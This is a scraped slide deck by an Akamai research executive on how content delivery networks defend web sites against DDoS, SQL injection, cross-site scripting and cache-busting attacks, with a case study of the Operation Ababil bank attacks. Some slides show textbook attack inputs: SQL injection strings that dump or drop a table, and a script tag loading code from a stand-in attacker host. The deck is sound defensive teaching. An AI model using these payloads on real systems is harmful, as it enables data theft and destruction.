Upload
elwin-ray
View
218
Download
4
Tags:
Embed Size (px)
Citation preview
The Role of Content Delivery Networksin
Protecting Web Sites from Attacks
Bruce Maggs
VP for Research, Akamai Technologies
©2013 AKAMAI | FASTER FORWARDTM
The Akamai Platform and Services
Daily Traffic:• 33+ Tbps peak• 19+ million hits per second• 600+ million IPv4 clients/day• 4+ trillion deliveries/day• 30+ petabytes/day• 10+ million concurrent streams
Delivering 130,000+ Domains
• All top 60 ecommerce sites• All top 30 media & entertainment companies • 9 of the top 10 banks• All of the top Internet portals
• 175,000+ Servers• 1,300+ Networks• 2,500+ Physical Locations• 650+ Cities• 100+ Countries
A Global Platform:
©2013 AKAMAI | FASTER FORWARDTM
Distributed Denial of Service (DDOS) Attacks
The attacker hopes to overwhelm the content provider’s resources with requests for service.
Sometimes the attacker employs a “bot army” of compromised machines.
The attacker tries to issue requests for content that cannot be cached.
The attacker looks for “amplification” where an easy-to-generate request requires a difficult-to-generate response.
©2013 AKAMAI | FASTER FORWARDTM
991 1317 2002 2936
2013
20112010
2012
Attack Frequency (Attacks Detected and Mitigated)
5634
2014
©2013 AKAMAI | FASTER FORWARDTM
Gbps
Mpps 20092008
2005
112
2006
188
2007
2211
39
15
48
29
2010
68
38
2011
79
45
2012
8269
2014
320
270
2013
190
144
Largest Attacks by Year
©2013 AKAMAI | FASTER FORWARDTM
Attack Types Q3 2014
©2013 AKAMAI | FASTER FORWARDTM
US23.95%
China20.07%
Germany5.78%
Korea6.13%
Mexico14.16%
Brazil17.60%
Japan4.10%
Russia2.97%
India2.81%
Thailand2.43%
Attack Origins Q3 2014
©2013 AKAMAI | FASTER FORWARDTM
Avoid data theft and downtime by extending the security perimeter outside the data-center and protect from increasing frequency, scale and sophistication of web attacks.
Targeted Industry Sectors
©2013 AKAMAI | FASTER FORWARDTM
Origin Server
End User
1
10
100
10000
Origin Traffic
1000
Akamai Traffic
1
10
100
10000
1000
The Akamai Platform Provides a Perimeter Defense
©2013 AKAMAI | FASTER FORWARDTM
Defeating HTTP flooding attacks – Rate Controls
1. Count the number of Forward Requests
2. Block any IP address with excessive forward requests
Client Request
Forward Request
Forward Response
CustomerOrigin
AkamaiEdge Server
XCustom Error page
©2013 AKAMAI | FASTER FORWARDTM
Filtering Out Malformed Requests
• SQL injection attacks
• Cross-site scripting (XSS) attacks
• Cache busting attacks
©2013 AKAMAI | FASTER FORWARDTM
Relational databases
Relational databases store tables consisting of rows and columns.
(image from http://support.sas.com)
©2013 AKAMAI | FASTER FORWARDTM
Structured Query Language (SQL)
Example Query:
SELECT * FROM Employees WHERE LName = ’PARKER’;
IdNum LName FName JobCode Salary Phone1354 PARKER MARY FA3 65800 914/455-2337
©2013 AKAMAI | FASTER FORWARDTM
Example SQL Injection
Suppose a program creates the following SQL query, where userName is a variable holding input provided by an end-user, e.g., through a form on a Web page.
SELECT * FROM Employees WHERE LName = ’” + userName + ”’;”
But instead of entering a name like PARKER the user enters
’ or ’1’=’1
Then the query becomes
SELECT * FROM Employees WHERE LName = ’’ or ’1’=’1’;
This query returns all rows in the Employees table!
©2013 AKAMAI | FASTER FORWARDTM
A More Destructive Injection
Same code as before:
SELECT * FROM Employees WHERE LName = ’” + userName + ”’;”
But now suppose the user enters
a’; DROP TABLE Employees
Then the query becomes
SELECT * FROM Employees WHERE LName = ’a’; DROP TABLE Employees;
This query might delete the Employees table! (Not all databases allow two queries in the same string.)
©2013 AKAMAI | FASTER FORWARDTM
bobby-tables.com: A guide to preventing SQL injection
(from the comic strip xkcd)
©2013 AKAMAI | FASTER FORWARDTM
Cross-Site Scripting
Attacker types this into text entry form:
<script src=http://theftsRus.com/script.js></script>
Attacker hopes that later the site will insert this into the HTML that it outputs, and then the victim’s browser will execute the script.
©2013 AKAMAI | FASTER FORWARDTM
Cache Busting
Attacker adds query strings to the end of a requested URL, e.g.,
http://ak.xyz.com/logo.gif?id=832164328
Attacker hopes that the CDN will view each request with a different query string as a request for a different object, and fetch a new copy from the content provider.
©2013 AKAMAI | FASTER FORWARDTM
Operation Ababil
Phase 1Sep 12 – Early Nov 2012
• DNS packets with “AAAAA” payload
• Limited Layer 7 attacks• Early-mid Oct 2012
announced names of banks where attacks succeeded
• (Did not announce bank names if attacks were unsuccessful)
• Began use of HTTP dynamic content to circumvent static caching defenses
Phase 2Dec 12, 2012 – Jan 29
• Incorporate random query strings and values
• Addition of random query strings against PDFs
• Additions to bot army
• Burst probes to bypass rate-limiting controls
• Addition of valid argument names, random values
Phase 3
• Multiple probes• Multiple targets• Increased focus on Layer
7 attacks• Target banks where
attacks work• Fraudsters take
advantage
Late Feb 2013 – May 2013
“none of the U.S banks will be safe from our attacks”
Phase 4
• Used fake plug-ins to infect files
July 2013 –
©2013 AKAMAI | FASTER FORWARDTM
DNS Traffic Handled by Akamai
1.8 M
1.6 M
1.4 M
1.2 M
1.0 M
0.8 M
0.6 M
0.4 M
0.2 M
0.0
Total eDNS
Tues 12:00 Wed 00:00 Wed12:00
s
Phase 1 Attack – Sept 2012
20
Attack Traffic:
23 Gbps(10,000X normal)
Duration:
4.5 Hours
High volume of non-standard packets sent to UDP port 53Packets did not include a valid DNS headerPackets consisted of large blocks of repeating “A”sThe packets were abnormally large Simultaneously, a SYN-Flood was directed against TCP port 53
©2013 AKAMAI | FASTER FORWARDTM
Phase 2 Attacks - January 2nd, 2013
Bank #1
Bank #2
Bank #3
Bank #4
Bank #5QCF targeted PDF files
Akamai Dynamic Caching Rules offloaded 100% of the traffic
No Origin Impact
©2013 AKAMAI | FASTER FORWARDTM
Phase 2 Attacks - January 2nd, 2013
Bank #1
Bank #2
Bank #3
Bank #4
Bank #5QCF targeted marketing web pages
Rate controls automatically activatedAttack was deflected, far from bank’s datacenter
No Origin Impact
©2013 AKAMAI | FASTER FORWARDTM
Phase 2 Attacks - January 2nd, 2013
Bank #1
Bank #2
Bank #3
Bank #4
Bank #5QCF targeted SSL
Akamai offloaded 99% of the traffic
No Origin Impact
©2013 AKAMAI | FASTER FORWARDTM
Phase 2 Attacks - January 2nd, 2013
Bank #1
Bank #2
Bank #3
Bank #4
Bank #5
12:03 PM 9:00 AM
Error/Outage—site not responding
Gomez agents in 12 cities measuring hourly
NOT on Akamai
©2013 AKAMAI | FASTER FORWARDTM
Phase 2 Attacks - January 2nd, 2013
Bank #1
Bank #2
Bank #3
Bank #4
Bank #5
Gomez agents in 12 cities measuring hourly
NOT on Akamai
12:44 PM 6:21 PM
Error/Outage—site not responding
©2013 AKAMAI | FASTER FORWARDTM
Phase 3 Attack Example
• Attack started at March 5, 2013 morning
• Peak Attack Traffic > 126 thousand requests per second
• 70x normal Edge Bandwidth (29Gbps)• Origin Traffic stayed at normal levels
• ~2000 Agents participated in the 20 minute assault• 80% of the agents were new IP addresses that had not participated in earlier
campaigns
©2013 AKAMAI | FASTER FORWARDTM
Attack Tactics - Pre-attack Reconnaissance
Attackers test the site with short burst high speed probes• Short bursts of attack requests on non-cacheable content every 10 minutes• Peak of 18 million requests per second
If the site falters, they announce that they will attack that bank and return later with a full scale attack
If the site is resilient they move on
©2013 AKAMAI | FASTER FORWARDTM
Observations
Due to recent attack sizes, infrastructure capacity build out is not economical, and may not work anyway
• Attacks range from 13X to 70X normal traffic, 25X to 120X normal request volume
The burst speed of attacks has become too fast for reactive mitigation – a proactive “always-on” defense is necessary